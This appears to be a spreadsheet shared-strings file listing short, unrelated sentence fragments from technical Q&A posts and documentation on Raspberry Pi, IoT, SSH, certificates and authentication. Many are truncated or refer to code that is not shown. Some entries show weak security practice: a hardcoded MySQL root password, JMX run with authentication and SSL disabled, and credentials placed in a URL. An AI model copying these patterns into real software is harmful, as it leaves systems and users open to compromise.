So you will at first specify the output file as a string and then (optional) the format.</t>
  </si>
  <si>
    <t>(note that the password is kept invisible on the command line, make sure you are hitting the correct keys)</t>
  </si>
  <si>
    <t>According to the raspberry PI docs: 
In your home folder, you will find a hidden file called 
  which contains some user configuration.</t>
  </si>
  <si>
    <t>You have to get the raw output of the advertisement as bytes with the  command, then parse the beacon identifiers out of these bytes.</t>
  </si>
  <si>
    <t>Save these changes, reboot your raspberry pi, and then it should be automatically connected to the hidden network upon returning to the desktop.</t>
  </si>
  <si>
    <t>Seems to be an issue with the IDE token parsing for long strings related to Java regex.</t>
  </si>
  <si>
    <t>I have an ansible role to register raspberrypi, fyr
https://github.com/reachlin/fangge/tree/master/ansible/roles/iot
You have to replace your credentials in file defaults/main.yml</t>
  </si>
  <si>
    <t>You can simply ignore them or usually better send an error message if you receive invalid commands.</t>
  </si>
  <si>
    <t>There are two parameters that control the Parity settings, and it's not clear if there's any invalid combinations.</t>
  </si>
  <si>
    <t>In Python file 'test.py' verify this text is in the first line: (see shebang explanation):
Also Python file should have correct privileges (execution for user www-data / apache if PHP script runs in browser or through curl) and/or must be "executable".</t>
  </si>
  <si>
    <t>I would just recommend being extra careful about security and verifying if you have a Static IP address (else get a static domain name/IP).</t>
  </si>
  <si>
    <t>User specific topic ACLs are added after a
  user line as follows:
user 
The username referred to here is the same as in password_file.</t>
  </si>
  <si>
    <t>Yes, the command line should be in this form:
Please also note that the default password is: p@ssw0rd
The zero can easily be mistaken as an 'O' so calling that part out.</t>
  </si>
  <si>
    <t>In addition, you should select Private Networks(Client &amp; Server) in the Capabilities(Package.appxmanifest) to allow your app to access the IoT Hub.</t>
  </si>
  <si>
    <t>if you use threads: threat1.conf, threat2.conf -- try to write script config to them.</t>
  </si>
  <si>
    <t>Hence, all public methods of your background service must have compatible types and signatures.</t>
  </si>
  <si>
    <t>So changing the method unlock_cooler to this should solve the error that you got:
Note that you would probably aslo want to call stop() on the PWM instance.</t>
  </si>
  <si>
    <t>Unique-index is an index that sets one or multiple fields to be unique in a data entity</t>
  </si>
  <si>
    <t>Code injection is a security vulnerability that allows to execute the malicious code, supplie in the string that should be treated as a data-only string.</t>
  </si>
  <si>
    <t>The Java Swing component for a single line of masked text input (typically a password).</t>
  </si>
  <si>
    <t>Attempts to violate this restriction will cause the offending method or constructor invocation to throw a ClassCastException.</t>
  </si>
  <si>
    <t>Description
The $HOME/ file contains information used by the automatic login feature of the rexec and ftp commands.</t>
  </si>
  <si>
    <t>To connect to a specific database by using the file name, connect using a connection string similar to "Server=(LocalDB)\MSSQLLocalDB; Integrated Security=true ;AttachDbFileName=D:\Data\MyDB1.mdf".</t>
  </si>
  <si>
    <t>As of Snow Leopard, this is the preferred method of managing privilege escalation on Mac OS X and should be used instead of earlier approaches such as BetterAuthorizationSample or directly calling AuthorizationExecuteWithPrivileges.</t>
  </si>
  <si>
    <t>The UIMA framework also provides APIs and methods to automatically deploy, verify and run PEAR packages.</t>
  </si>
  <si>
    <t>Stripe Key
Finally, set your Stripe key in your services.php configuration file:
'stripe' =&gt; [
    'model'  =&gt; 'User',
    'secret' =&gt; env('STRIPE_API_SECRET'),
],
Reference</t>
  </si>
  <si>
    <t>The Core API is based on HTTP and OAuth and provides low-level calls to access and manipulate a user's Dropbox account.</t>
  </si>
  <si>
    <t>References
Immutable Layers, Not (Just) Infrastructure
On the Integrity of Data
Issue Navigator - ASF JIRA: jql=text ~ "leader"</t>
  </si>
  <si>
    <t>Packages that import unsafe may be non-portable and are not protected by the Go 1 compatibility guidelines.</t>
  </si>
  <si>
    <t>The user agent MAY repeat the request with a new or replaced Authorization header field2.</t>
  </si>
  <si>
    <t>By way of the RIFF format, the audio-visual data contained in the "movi" chunk can be encoded or decoded by software called a codec, which is an abbreviation for (en)coder/decoder.</t>
  </si>
  <si>
    <t>Can it be a permissions issue (though permissions to UsbDevice is granted and passing via a socket seems to hold permissions, the device is not rooted)?</t>
  </si>
  <si>
    <t>I just set up SSH on my Raspberry Pi B+ via a public-private-key, so I dont have to type in my Password every time I log into my Pi.</t>
  </si>
  <si>
    <t>Can I make the request incorporating the Key and Secret directly into the above line as parameters?</t>
  </si>
  <si>
    <t>I've tried these steps in my secure home network as well as the open network at my local library.</t>
  </si>
  <si>
    <t>is there any specific way to validate the connection string in spark and also please tell me the format which i specified is correct or not .</t>
  </si>
  <si>
    <t>According to WiFi.h The return values of the  functions (all three of them, one for each security scheme) are ints.</t>
  </si>
  <si>
    <t>Apparently the Arduino platform have neither of the functionality listed above, which mean you have to tokenize the string yourself.</t>
  </si>
  <si>
    <t>They said rightfully..You need to comment out that line to reject any chip ID checking mechanisms.</t>
  </si>
  <si>
    <t>This would give a string safe version of the data, but it would need decoding before use at the other end.</t>
  </si>
  <si>
    <t>From the picture I can tell you though that that relay would not pass electrical code for home control in my area.</t>
  </si>
  <si>
    <t>It cant be made by using AWS SDK because you need to use your private rootCA key and AWS has not this main element and aws shouldnt have it.</t>
  </si>
  <si>
    <t>Another option is that the sudo did not work at all - then you would execute the command as unprivileged user and would end up with the error messages that you currently have.</t>
  </si>
  <si>
    <t>private data or large files), rearrange file structure, fix commit metadata, etc.</t>
  </si>
  <si>
    <t>Specify key file pass phrase
Use multiple key files to authenticate
Supports diffie-hellman-group-exchange-sha256, diffie-hellman-group-exchange-sha1, diffie-hellman-group14-sha1 and diffie-hellman-group1-sha1 key exchange methods.</t>
  </si>
  <si>
    <t>where the server instance generates the key pairs, and server keeps the public key and send the private key to user.</t>
  </si>
  <si>
    <t>EDIT: The full code has been removed for confidential reasons.</t>
  </si>
  <si>
    <t>I am running it like 
but some commands like  or type fails with permission denied error in result file.</t>
  </si>
  <si>
    <t>EDIT:
Encoding Type of channel is "pass-through".</t>
  </si>
  <si>
    <t>The sample code I'm using is shown below:
Thank you,
Johny 1984
the way I connecting to RPI over SSH
The error with the bunch of text above:
Xlib.error.DisplayNameError: Bad display name ""</t>
  </si>
  <si>
    <t>I forgot that for ints/longs, the function's input argument wants to be unsigned.</t>
  </si>
  <si>
    <t>Then add these two lines:
This asserts the identification of the SSH key.</t>
  </si>
  <si>
    <t>We shall see... to get it, run:  and put the roots.pem in the same directory as the private key on device.</t>
  </si>
  <si>
    <t>Since every unit is public by definition - and since BPL may be re-used by other apps - the Smart Linker is defeated.</t>
  </si>
  <si>
    <t>invoker:verify verifies the result of invoker:integration-test.</t>
  </si>
  <si>
    <t>-keepattributes Signature
# Retain service method parameters.</t>
  </si>
  <si>
    <t>Cloud can have any of the four types of access: Public, Private, Hybrid, and Community.</t>
  </si>
  <si>
    <t>Apple maintains a list of public UTIs, and allows the creation of private, or 'third-party' UTIs.</t>
  </si>
  <si>
    <t>Shellcodes get that name because they typically start a command shell from which the attacker can control the compromised machine.</t>
  </si>
  <si>
    <t>My "except" command always gets bypassed whether connectivity exists or not.</t>
  </si>
  <si>
    <t>So when a UWP app is running on an IoT device like Raspberry Pi, it cannot get a unique device id by calling HardwareIdentification.GetPackageSpecificToken.</t>
  </si>
  <si>
    <t>Also, is it possible to add authorization header to url?</t>
  </si>
  <si>
    <t>Started rtkrcv with sudo ./rtkrcv
I get "invalid option value pos-1snrmask" but the program still runs.</t>
  </si>
  <si>
    <t>If you need to extend an existing certificate, you can use a program called RenewCert.</t>
  </si>
  <si>
    <t>Ultimately this was not a result of the pipe, the platform or permissions.</t>
  </si>
  <si>
    <t>Assertion is a method of verifying, if the code works as it was designed to.</t>
  </si>
  <si>
    <t>The string has been encoded using a modified UTF-8 format.</t>
  </si>
  <si>
    <t>Fast ASN.1 parser and serializer with definitions for private keys, public keys, certificates, CRL, OCSP, CMS, PKCS#3, PKCS#7, PKCS#8, PKCS#12, PKCS#5, X.509 and TSP</t>
  </si>
  <si>
    <t>WiFi Protected Setup (WPS) is a way of adding devices to a home network.</t>
  </si>
  <si>
    <t>Network management for deploying to many public &amp; private networks.</t>
  </si>
  <si>
    <t>What is the difference between public, private, and protected?</t>
  </si>
  <si>
    <t>The project, has a compiled lib mqtt3as.so which looks for libcrypt and libssl.</t>
  </si>
  <si>
    <t>I keep getting permission denied when i try to wget something or when i try to add a user.</t>
  </si>
  <si>
    <t>Is it possible register into Google Beacon Plataform the eddystone beacons created using PyBeacon package?</t>
  </si>
  <si>
    <t>I might be mistaken, but if you want your devide to be recognized during boot, it's  should be 0x01 (Boot device subclass).</t>
  </si>
  <si>
    <t>Next, you need to add some developer SSH public keys to the
  authorized_keys file for that user.</t>
  </si>
  <si>
    <t>But... we're passing in the uninitialized value of something as parameter.</t>
  </si>
  <si>
    <t>First in your manifest file add these permissions:
Then use this in your main.</t>
  </si>
  <si>
    <t>Create your own Keystore and then put those new credentials and alias in the app.</t>
  </si>
  <si>
    <t>Try adding dwc_otg.fiq_fsm_mask=0x3 to /boot/cmdline.txt and restart the device.</t>
  </si>
  <si>
    <t>You need to create your own private rootCA key and only you should have it.</t>
  </si>
  <si>
    <t>Get, Add, Update, Remove, Exists, &amp; Clear Cache with many options, Absolute &amp; sliding expirations, Lock/unlock, item versioning, and streaming API provided.</t>
  </si>
  <si>
    <t>It looks like the correct solution is to supply a command-line option like this:
which seems to default you to no permissions (even access to files and high ports), then add the ones your app needs back in with the policy file.</t>
  </si>
  <si>
    <t>Satellizer is a simple to use, end-to-end, token-based authentication module for AngularJS with built-in support for Google, Facebook, LinkedIn, Twitter authentication providers, plus Email and Password sign-in method.</t>
  </si>
  <si>
    <t>you need to:
configure your server for https (but it will show a security alert because of bad certificate)
tell your server to rewrite any "unknown" url to a specific virtual host showing your home page</t>
  </si>
  <si>
    <t>JavaScript injection is possible if the attacker-supplied string (say signature, username or unfiltered blog post) is returned back to the browser "as is".</t>
  </si>
  <si>
    <t>Edit: Actually in some situation autodetection exists (and then detect function is called), but I2C bus has to agree on it (and device class have to match, among others).</t>
  </si>
  <si>
    <t>It adds a flag dropdown to any input, detects the user's country, displays a relevant placeholder and provides formatting/validation methods.</t>
  </si>
  <si>
    <t>Due to the "not found" response I'm assuming this is a PATH or CLASSPATH error, but when answering could you also mention permission setting as once the PATH is set that will likely be the next hurdle.</t>
  </si>
  <si>
    <t>Using an "Echo Proxy" still requires to have the service accessible from internet (More on Echo Proxy: https://www.reddit.com/r/amazonecho/comments/3blkax/alexa_api_proxy_java/ )
Using "HUE Bridge Emulator" will help you fork the Alexa request to a private(internal only) https server.</t>
  </si>
  <si>
    <t>You need to fill in the Kick-start your blockchain project form and then the blockchain team will get in touch: https://console.ng.bluemix.net/docs/services/IoT/reference/extensions/index.html#blockchain</t>
  </si>
  <si>
    <t>If your JWT token contains any authorization info then I would suggest to strip that off to keep it limited to authentication only as authorization is meant to be done by the iot policy documents returned by your authorizer.</t>
  </si>
  <si>
    <t>There is a server running on a Raspberry Pi which, when authenticated by a String, sends me back Power Metering Info from Smart Plugs in my house every 30 seconds.</t>
  </si>
  <si>
    <t>For a test, I copied the code from the documentation (and defined the app-key and secret, of course):
I was able to get the URL and to click allow.</t>
  </si>
  <si>
    <t>I'm pretty sure it's not the base64 code but rather the Java Regex which I know nothing about (simply that it deals with tokenizing long strings and seems related to the error).</t>
  </si>
  <si>
    <t>Since Simple Pairing Mode is not available I thought of using a fixed PIN (like 0000) so that when the computer asks for a PIN I can input 0000 and it will pair the devices.</t>
  </si>
  <si>
    <t>If you really really need to hide this Wire instance, you could copy the source of the Wire lib into your own lib, and remove that last line.</t>
  </si>
  <si>
    <t>If you use the AT commands, it will not help your case hence there is no non-blocking TCP implementation on it to handle the async HTTP requests.</t>
  </si>
  <si>
    <t>Looking at the source for the Arduino firmware's station class one can see that WiFi.config(0u, 0u, 0u); actually changes a protected flag in addition to executing wifi_station_dhcpc_start(), so I would say that using WiFi.config(0u, 0u, 0u); is the way to go.</t>
  </si>
  <si>
    <t>Create a desktop entry for the program and place it in 
As an example that starts Safe Eyes program placing it as ~/.config/autostart/safeeyes.desktop.</t>
  </si>
  <si>
    <t>Most of the time the decision is based on the User-agent string or the existence of some proprietary properties.</t>
  </si>
  <si>
    <t>Projects on Cloud9 can be public (and open-source) or private for users who pay a monthly fee, and can be run on an Ubuntu server provided with each workspace.</t>
  </si>
  <si>
    <t>It is quite easy to display the stored passwords in plain text, although the defaults try to avoid this.</t>
  </si>
  <si>
    <t>The  tools is the standard Windows command line mechanism to talk to crypto API apps.</t>
  </si>
  <si>
    <t>The package is typically only imported for the side effect of registering its HTTP handlers.</t>
  </si>
  <si>
    <t>Use a public subnet for resources that must be connected to the internet, and a private subnet for resources that won't be connected to the internet.</t>
  </si>
  <si>
    <t>In recent years, intelligent agent systems have also developed, which depend on a similar capability.</t>
  </si>
  <si>
    <t>If a client authenticates he can control one RPi sending commands that gets translated into GPIO commands.</t>
  </si>
  <si>
    <t>Then after I return to the house (work, vacation, etc), I want to plug in a keyboard, hit a key to exit the program, shutdown safly and be able to view any security incidents when I connect it to a monitor.</t>
  </si>
  <si>
    <t>journalctl | grep blue returns:
As far as I was able to find out the line Feb 12 13:24:55 raspberrypi bluetoothd[336]: Failed to set privacy: Rejected (0x0b) can be ignored.</t>
  </si>
  <si>
    <t>Messages controlling the configuration of the ECU and other modules are most likely of this kind, regarded as private to the manufacturer.</t>
  </si>
  <si>
    <t>If the plane has a normal vector n, then the projector operator is P( n ) = 1 - nn, where 1 is the identity operator and nn is the outer (tensor) product of the normal vector with itself.</t>
  </si>
  <si>
    <t>In fact, UPnP does not itself provide a discovery mechanism, but relies on a protocol called SSDP (Simple Service Discovery Protocol) to discover hosts on the local network.</t>
  </si>
  <si>
    <t>The only thing I noticed looking at your code:
When I use aws-requests-auth, my call looks like this:
Just wanted to call out the json.dumps(), which stringifies my params object.</t>
  </si>
  <si>
    <t>It is what the Clang and GCC folks recommend, and it will make it easy to do things like test your program with sanitizers (-fsanitize=address, -fsanitize=undefined, etc).</t>
  </si>
  <si>
    <t>Because these elements are private, they are usually generated in place in the local filesystem or hardware security module, and then never moved.</t>
  </si>
  <si>
    <t>By default, editions are accessible through a private URL which the publisher may share with its customers.</t>
  </si>
  <si>
    <t>Additionally for iOS 3.0, the canPerformAction:withSender: method allows responders to validate commands in the user interface while the undoManager property returns the nearest NSUndoManager object in the responder chain.</t>
  </si>
  <si>
    <t>I've tried making it run on startup by placing some commands in /etc/rc.local so that it can have root access automatically.</t>
  </si>
  <si>
    <t>If, instead, you know certainly that it is text, you must know then in which charset it has been encoded, and set it to the InputStreamReader as a second parameter:
Possible encodings:
ASCII 
UTF-8
UTF-16
ISO-8859-1
ISO-8859-2
BIG-5 (for Chinese)</t>
  </si>
  <si>
    <t>Since you don't receive "access denied" error so I suppose you have already added the following capability in the Package.appxmanifest.</t>
  </si>
  <si>
    <t>The main purpose of Spy++ is to log messages that are being passed around in Windows.</t>
  </si>
  <si>
    <t>The site would publish to the public any data that is not private or restricted for national security reasons.</t>
  </si>
  <si>
    <t xml:space="preserve"> - delete a user account and related files
Synopsis
Description
The userdel command modifies the system account files, deleting all entries that refer to the user name LOGIN.</t>
  </si>
  <si>
    <t>[...] the main purpose of Spy++
  is to log messages that are being
  passed around in Windows.</t>
  </si>
  <si>
    <t>Because the format of the .pdb file generated by the postcompiler tools undergoes constant revision, exposing the format is impractical.</t>
  </si>
  <si>
    <t>Based on the doc Using the MQTT protocol directly the password must be in the following format, see example:
You have to generate the above password (sas token) string.</t>
  </si>
  <si>
    <t>Private, direct messages to other users are possible, as well as public replies and "@mentions".</t>
  </si>
  <si>
    <t>The error that shows in your screenshot indicates that a part of the shared access signature is missing or cannot be parsed.</t>
  </si>
  <si>
    <t>Note that everything works if I wait until the login prompt before adding the USB device.</t>
  </si>
  <si>
    <t>So is it possible to pair the device making the pin hard coded at the server end or not using pin for pairing?</t>
  </si>
  <si>
    <t>I want to encrypt text by AES 128 CBC, but the results is different in Arduino and online tool.</t>
  </si>
  <si>
    <t>I refer this demo, but there is no clear explanation of using private and public key with a certificate, Instead of that it contains a constant file as below.</t>
  </si>
  <si>
    <t>---EDIT
I'm trying a different demo and it says the Pro Micro is paired
But i'm getting "Connection error: SecurityError: Access denied."</t>
  </si>
  <si>
    <t>The problem is that for the current  in current_ip.txt, the string eth0: is not found.</t>
  </si>
  <si>
    <t>After this check, all numbers passed are being added to whitelist.</t>
  </si>
  <si>
    <t>The final SAS-token will have this format:
I can't reproduce your issue.</t>
  </si>
  <si>
    <t>Install iothub explorer CLI tool: 
Login: iothub-explorer login "PUT YOUR IOTHUB CONNECTION STRING HERE"
Run this command and show us the result:iothub-explorer list</t>
  </si>
  <si>
    <t>Possible solution is to use static cast from int to, but you should declare yout enum as not anonymous.</t>
  </si>
  <si>
    <t>Remember to add .env to your .gitignore or other VCS-ignoring config,
otherwise your production credentials can still be available.</t>
  </si>
  <si>
    <t>I have a python driver used for uploading firmware and a config file via the Spi port.</t>
  </si>
  <si>
    <t>Adding more users gives original result of not being able to login for smtp.</t>
  </si>
  <si>
    <t>I have switched to use the following code in C# and this gets a string through without corruption.</t>
  </si>
  <si>
    <t>It's already installed under RPi AFAIK, but you probably want to generate a public/private keypair and only permit login to your server using the keypair (i.e.</t>
  </si>
  <si>
    <t>If you try to do something invalid to your hardware through your program you could end up with a fried microchip.</t>
  </si>
  <si>
    <t>Other clients, for example Y, can verify the X's public key using CA's public key.</t>
  </si>
  <si>
    <t>About this Add-on:
Use tamperdata to view and modify HTTP/HTTPS headers and post parameters.</t>
  </si>
  <si>
    <t>JIntellitype is a Java API for interacting with Microsoft Intellitype commands as well as registering for Global Hotkeys in Java applications.</t>
  </si>
  <si>
    <t>For added assurance, you can import or generate keys in HSMs (keys never leave the HSM boundary).</t>
  </si>
  <si>
    <t>mailin is trying to create a temporary folder but it obviously doesn't have permissions.</t>
  </si>
  <si>
    <t>Context: I'm creating a home security device.</t>
  </si>
  <si>
    <t>Tried adding the cert (in all formats .cer, .pem, .crt) using the certutil command as below.</t>
  </si>
  <si>
    <t>This will be masked by the exception IOError block, and the function will then return -1.</t>
  </si>
  <si>
    <t>Your Azure Container Registry is private.</t>
  </si>
  <si>
    <t>Simply put, if you don't have a public IP, there's no way to connect to your RPi.</t>
  </si>
  <si>
    <t>The guide above describe how to create a private PoA network.</t>
  </si>
  <si>
    <t>I tried passing my API Key as a username by doing client.connect("arduinoMQTT", "APIKEY") but then the code won't compile.</t>
  </si>
  <si>
    <t>Any sort of password encryption and Lua compiling is security by obscurity (and hence no security).</t>
  </si>
  <si>
    <t>How to create device certificate files you can reference here.</t>
  </si>
  <si>
    <t>I created an alias in bash_profile,
 and it worked.</t>
  </si>
  <si>
    <t>Is your return statement in the encryption function indented too much?</t>
  </si>
  <si>
    <t>If run in the same folder as a project file (.csproj, .vbproj, .fsproj), spec creates a tokenized .nuspec file.</t>
  </si>
  <si>
    <t>I tried Install Older Version of Mono
but it does not help
here is what I run
But when I run the last command I get:
I think it has something to do with then I run sudo apt-update I get the following as the last two lines:
W: GPG error: http://debian.yeasoft.net wheezy InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 40FC0CD26BF18B15
W: Conflicting distribution: http://download.mono-project.com wheezy/snapshots/4.2.4.4 InRelease (expected wheezy/snapshots but got wheezy)</t>
  </si>
  <si>
    <t>Sad part is log level is DEBUG configured yet cloud watch shows only INFO and no info to know why rules not fired.</t>
  </si>
  <si>
    <t>used this package 
https://github.com/aws/aws-iot-device-sdk-js
but got error while running app
here i called this function connectToIoT when app is opened..
keyPath,certPath,caPath files are stored in root of the project
how to get rid of this error and connect my device to aws-iot???</t>
  </si>
  <si>
    <t>In this case, upon trying to restart all containers, the mongodb container keeps exiting with status code 100, and the only way to fix it is to manually remove the lock file by running: sudo rm /data/db/mongod.lock in my terminal.</t>
  </si>
  <si>
    <t>merge-sketch-with-bootloader.lua /tmp/sketch.hex
run-avrdude /tmp/sketch.hex
Now my question would be, how to do this for multiple arduinos (yun1,yun2,...,yunN) without entering actually ssh-ing into each single device in order  to run the bottom 2 commands.</t>
  </si>
  <si>
    <t>I want to secure the node-red editor, for which i followed the security.html page provided by node red and also I watched a video on youtube.</t>
  </si>
  <si>
    <t>The Sobel operator, sometimes called Sobel Filter, is used in image processing and computer vision, particularly within edge detection algorithms.</t>
  </si>
  <si>
    <t>UPDATE with some aditional info
I've tried something like this (empty sample, just sending AT commands):
AT
OK
AT+CWJAP="SSID","password"
OK
AT+CIPSTART="TCP","50.16.237.179",80
OK
Linked
AT+CIPSEND=30
&gt; GET /qucuwrqu?key=sometest\r\n
SEND OK
OK
Unlink
But there is no response on web side.</t>
  </si>
  <si>
    <t>It is also worth noting that this same trace occurs regardless of what i put in as the authorization code, even just putting in "x" produces the same output.</t>
  </si>
  <si>
    <t>More Info:
This is the secure daemon: https://github.com/Azure/iotedge/tree/master/edgelet it is an iot edge specific component which acts as a bootstrapper to fire up the iot edge agent module which then fires up the other modules.</t>
  </si>
  <si>
    <t>I'm trying to debug an issue with one line of a script that is executed on the host machine to call out to a LAN-attached Raspberry Pi with SSH to return some information about the Pi.</t>
  </si>
  <si>
    <t>It's even possible that the XBee modules are using a proprietary protocol on top of 802.15.4 for their features like Remote AT Commands and Transparent Serial Data.</t>
  </si>
  <si>
    <t>To build the C SDK application correctly for the ESP8266 platform, disable the Encryption feature with  CMake command line argument.</t>
  </si>
  <si>
    <t>In PHP, when you get a completely blank page it often means that a fatal server error occurred, but that PHP was not allowed to report the error in plain text to the client (for security reasons).</t>
  </si>
  <si>
    <t>Auth token timeout it NOT consistent in my experience--sometimes it is exactly an hour, but other times it can be significantly more (like several hours) or significantly less.</t>
  </si>
  <si>
    <t>Go through this blog post: http://nilhcem.com/android-things/google-assistant-smart-home
You will have to set up a OAuth server but as @Prisoner said you can use ngrok to tunnel the device to internet, BUT I would recommend using "localtunnel" as it provides a free static url and the set-up is also easy.</t>
  </si>
  <si>
    <t>More info on localtunnel setup:- 
How to generate fixed url with ngrok 
Moreover you need to activate the OAuth server only once for account linking &amp; than you can close it.</t>
  </si>
  <si>
    <t>Additionally, when I was testing inbound calls and receiving the error, , this was because the account I registered wasn't associated with the phone number.</t>
  </si>
  <si>
    <t>encodeURIComponent is a core JavaScript function that escapes special characters in strings so that they can be safely used in URIs as components of query strings or hashes.</t>
  </si>
  <si>
    <t>It is a format for sending a Certification Signing Request: it encodes a public key, that can be manipulated using openssl.</t>
  </si>
  <si>
    <t>SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).</t>
  </si>
  <si>
    <t>Introduction
The ProGuard tool shrinks, optimizes, and obfuscates your code by removing unused code and renaming classes, fields, and methods with semantically obscure names.</t>
  </si>
  <si>
    <t>Local network proxy
Verdaccio can proxy for multiple registries resolving all dependencies using an unique endpoint.</t>
  </si>
  <si>
    <t>It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery.</t>
  </si>
  <si>
    <t>To edit /boot/cmdline.txt you must either already have root access, or the ability to physically swap the card.</t>
  </si>
  <si>
    <t>The main difference from software development standpoint of iOS private API that such APIs aren't declared in header files.</t>
  </si>
  <si>
    <t>For example it makes no sense to validate each element of an array when it turns out to be an empty string.</t>
  </si>
  <si>
    <t>Here's the content of my db.php file: 
&lt;?php
$servername = "localhost";
$user = "root"; // also tried with a new user named "yohlo" - same problem
$pass = "password";
$database = "mydatabase";
$db = mysqli_connect($servername, $user, $pass, $database);
if(!$db) {
        die("Connection failed: " .</t>
  </si>
  <si>
    <t>The IoT Edge agent must be configured with
  credentials for the container registry if the image is protected by a
  password.</t>
  </si>
  <si>
    <t>I did look at the Bluetooth HID over GATT Specification but did not find clues on how to achieve to be notified about key-press-events.</t>
  </si>
  <si>
    <t>[https://www.devglan.com/online-tools/aes-encryption-decryption]
Key : 0000000000000000
IV  : 0000000000000000
Text: Now is the time ABCDABC
I'm encrypt in web and the result is
1a7OeiH628V7IIoLU6+3n7ILev6IwcZYVNLalS/TBEg=
So I can't decrypt each other.</t>
  </si>
  <si>
    <t>I think you forgot in the first aproach adding 
to the network block in wpa_supplicant.conf to make the network work with hidden ssid.</t>
  </si>
  <si>
    <t>It can scan the devices, but sometimes cannot end the scan, or return with the MAC-addresses, with the usual error message.</t>
  </si>
  <si>
    <t>One of the earliest public key encryption applications was called Pretty Good Privacy (PGP).</t>
  </si>
  <si>
    <t>But most of the time, the readline would either fail throwing an exception or return corrupted data, like missing a digit.</t>
  </si>
  <si>
    <t>To be able to communicate with the device without root I used this command to add myself to the group which can access serial devices.</t>
  </si>
  <si>
    <t>I want to edit some files in one add-on that is installed on the raspberry, so I want to access it trough ssh, but where is it?</t>
  </si>
  <si>
    <t>From this time, all the file upload tasks will pass without security questions.</t>
  </si>
  <si>
    <t>And most importantly, it needs I/O privileges to enable me to save data to either .txt files or file formats.</t>
  </si>
  <si>
    <t>I'm relatively new to the whole world of certs and private keys so hopefully I missed something easy.</t>
  </si>
  <si>
    <t>:
I use the following code to get the output in python on my Raspberry:
The Terminal command can be executed using ssh from another device.</t>
  </si>
  <si>
    <t>I would like to do this in python but I don't even know where to start with only testing the eth0 if it has internet and monitoring its status.</t>
  </si>
  <si>
    <t>Auto login isn't available in raspi-config, and going into System &gt; Users and groups doesn't offer the option either.</t>
  </si>
  <si>
    <t>Public Private key authentication would be a good starting point.</t>
  </si>
  <si>
    <t>v7 Preference Support Library: Is one of the packages that added by google in order to provide better backwards compatibility for developers.</t>
  </si>
  <si>
    <t>If you do post your API key, even if you edit the question to remove it, delete your key and create a new one.</t>
  </si>
  <si>
    <t>fff is a micro-framework for creating fake C functions for tests.</t>
  </si>
  <si>
    <t>There are no methods to obtain HTTP Status codes or the 200/404/400/etc.</t>
  </si>
  <si>
    <t>My packet looks like 
How would I go about creating CRC to validate at the other end?</t>
  </si>
  <si>
    <t>You can add a hosts entry in the device from which you want to access your raspberry pi using a domain.</t>
  </si>
  <si>
    <t>You'll need to create an A record pointing to your public ip.</t>
  </si>
  <si>
    <t>run the following command inside from /repository/resources/security direcotory .</t>
  </si>
  <si>
    <t>Also, make sure that your device certificate, used when you added your device to your device registry, has not expired.</t>
  </si>
  <si>
    <t>You can get a valid  on Desktop but not on Windows IoT Core device.</t>
  </si>
  <si>
    <t>The following sanitizers are supported:
AddressSanitizer (ASAN) (since Clang 3.2, GCC 4.8) address-sanitizer
LeakSanitizer (LSan) (since Clang 3.4, GCC 4.9) leak-sanitizer
ThreadSanitizer (TSan) (since Clang 3.2, GCC 4.8) thread-sanitizer
Undefined Behavior Sanitizer (ubsan) (since Clang ?</t>
  </si>
  <si>
    <t>We suggest that you add these packages as well for Facebook, Google and/or Twitter authentication support.</t>
  </si>
  <si>
    <t>MUNGE is an authentication service for creating and validating credentials.</t>
  </si>
  <si>
    <t>End result is my server is up and running but I have no ssh capabilities into my box.</t>
  </si>
  <si>
    <t>This is why i wan't to trigger a compiler error if a user tries to use a invalid option.</t>
  </si>
  <si>
    <t>I am trying to create a PowerShell script to SSH into a Raspberry Pi and perform some commands.</t>
  </si>
  <si>
    <t>I created a registry and a device on google iot core and uploaded there the public key (ES256).</t>
  </si>
  <si>
    <t>I have tested this arduinoCode in which certs&amp;keys are already exist in the code.</t>
  </si>
  <si>
    <t>Use HMAC over SHA-256 to create a hash of the parameters.</t>
  </si>
  <si>
    <t>Try the following command to enforce apache access.</t>
  </si>
  <si>
    <t>Thus you'll see, the firmware doesn't yet make use of the new functions for WPA2 authentication.</t>
  </si>
  <si>
    <t>You can add a certificate to the Keychain using the  method as described in addCertificate.</t>
  </si>
  <si>
    <t>I use the line
to store the username.</t>
  </si>
  <si>
    <t>If I do the following:
String constString = ROOTCERT;
espClient.setCACert(constString.c_str());
It also does not work.</t>
  </si>
  <si>
    <t>the variable authInput is empty).</t>
  </si>
  <si>
    <t>getpwuid - UNIX/POSIX function to get the password file entry for a user ID</t>
  </si>
  <si>
    <t>EDIT: ADDED tcpdump with packet details
pi@raspberrypi ~ $ sudo tcpdump -nnXSs 0 port 1883
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
10:36:12.626081 IP 10.19.8.61.60353 &gt; 52.30.179.227.1883: Flags [S], seq 1221863 198, win 29200, options [mss 1460,sackOK,TS val 227462 ecr 0,nop,wscale 7], leng                                                                                        th 0
    0x0000:  4500 003c 5f98 4000 4006 e0d2 0a13 083d  E..&lt;_.@.</t>
  </si>
  <si>
    <t>The way you would login using a URL is: https://username:password@mail.google.com/mail/feed/atom
So what you can do is periodically parse the output and when &lt;fullcount&gt;0&lt;/fullcount&gt; value changes call your robot service via BLE which should act as a callback for this specific event.</t>
  </si>
  <si>
    <t>CAL will use its built inn intelligence and will automatically interpret the missed call generated from Cognalys services and perform the authentication process robotically without any interference or support from the developers end.</t>
  </si>
  <si>
    <t>The strange thing is that the JVM didn't crash after 12 hours of monitoring, everything was working ok. After restarting the server with "XX:+UnlockCommercialFeatures -XX:+FlightRecorder" and "-Dcom.sun.management.jmxremote.port=7091 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false" removerd, JVM crashed after 7 hours.</t>
  </si>
  <si>
    <t>I found a solution that uses the WebBrowser class Navigate(), sending the credentials as a 64 base encoded string, but the Navigate() of WebView only allows 1 argument, the URI, and nothing else.</t>
  </si>
  <si>
    <t>In this way symbol information is not added on release code, and only when code is compiled with DEBUG=1 the code shielded by 
#ifdef DEBUG_PROJ
    /* debug code here */
#endif
// or
#ifndef NDEBUG_PROJ
    /* debug code here */
#endif
finds its way into the binary, thus resulting smaller release executables.</t>
  </si>
  <si>
    <t>From SendEventAsync method implementation, 
The async operation shall retry until time specified in
  OperationTimeoutInMilliseconds property expire or unrecoverable
  error(authentication or quota exceed) occurs.</t>
  </si>
  <si>
